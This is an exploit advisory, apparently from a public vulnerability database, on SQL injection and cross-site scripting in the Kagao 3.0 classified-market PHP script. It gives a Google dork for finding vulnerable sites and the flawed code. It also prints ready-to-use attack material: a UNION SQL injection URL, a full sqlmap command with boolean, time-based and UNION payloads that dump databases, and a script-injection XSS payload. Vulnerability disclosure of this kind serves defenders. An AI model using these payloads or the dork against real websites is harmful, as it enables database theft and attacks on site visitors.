Kagao 3.0 Cross Site Scripting / SQL Injection

2016.06.28
Credit: Cyber Warrior
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89
CWE-79
Dork: inurl:/cat1.php?id2=

###################### # Application Name : Kagao v3.0 - Professional Classified Market # Google Dork : inurl:/cat1.php?id2= # Exploit Author : Cyber Warrior | Bug Researchers Group | N4TuraL # Vendor Homepage : http://kogaoscript.com/ # Vulnerable Type : SQL Injection & Cross Site Scripting # Date : 2016-06-26 # Tested on : Windows 10 / Mozilla Firefox # Linux / Mozilla Firefox # Linux / sqlmap 1.0.6.28#dev ###################### SQL Injection Vulnerability ###################### # Location : http://localhost/[path]/cat1.php ###################### # Vulnerable code : function pagenat(){ $buildLink = array( "id" => intval($_GET['id']), "id2" => isset($_GET['id2']) ? intval($_GET['id2']) : '', "suche" => htmlspecialchars($_GET['suche']), "sucheWo" => htmlspecialchars($_GET['sucheWo']), "umkreis" => intval($_GET['umkreis']), "page" => "" ); $buildLink = http_build_query($buildLink); $buildLink = 'cat1.php?' . $buildLink; if($_GET['id2']){ $pages_num = getZahlPage($_GET['id2'], 'unterkategorie'); } else{ $pages_num = getZahlPage($_GET['id'], 'kategorie'); } $page = (isset($_GET['page'])) ? max($_GET['page'], 1) : 1; $pages = ($pages_num > 1) ? pages($pages_num, $page, $buildLink) : ''; echo $pages; } ###################### # PoC Exploit: http://localhost/[path]/cat1.php?id2=999999.9%22%20union%20all%20select%20concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%2C0x27%2C0x7e%29--%20a # Exploit Code via sqlmap: sqlmap -u http://localhost/[path]/cat1.php?id2=10 --dbms=mysql --random-agent --technique=BUESTQ --dbs --tamper=versionedkeywords --level=3 --risk=3 --no-cast Parameter: id2 (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id2=10" AND 9863=9863 AND "UvFy"="UvFy Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: id2=10" AND SLEEP(5) AND "Zxun"="Zxun Type: UNION query Title: Generic UNION query (NULL) - 1 column Payload: id2=-5676" UNION ALL SELECT CONCAT(0x716b786271,0x4e77456d62457a716850544f776d506c7679624969616c6b47417542766c4152464c6a665a7a7064,0x7162767671)-- vvJN --- ###################### Cross Site Scripting Vulnerability ###################### # PoC Exploit: Search: "><script>alert('n4tural');</script> http://localhost/[path]/cat1.php?id2=0&pricestart=0&room=&flache=&price=&zulassung=&kilometer=&kraftstoff=&id3=0&suche=%22%3E%3Cscript%3Ealert%28%27n4tural%27%29%3B%3C%2Fscript%3E&id=0&sucheWo=&umkreis=0 ######################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top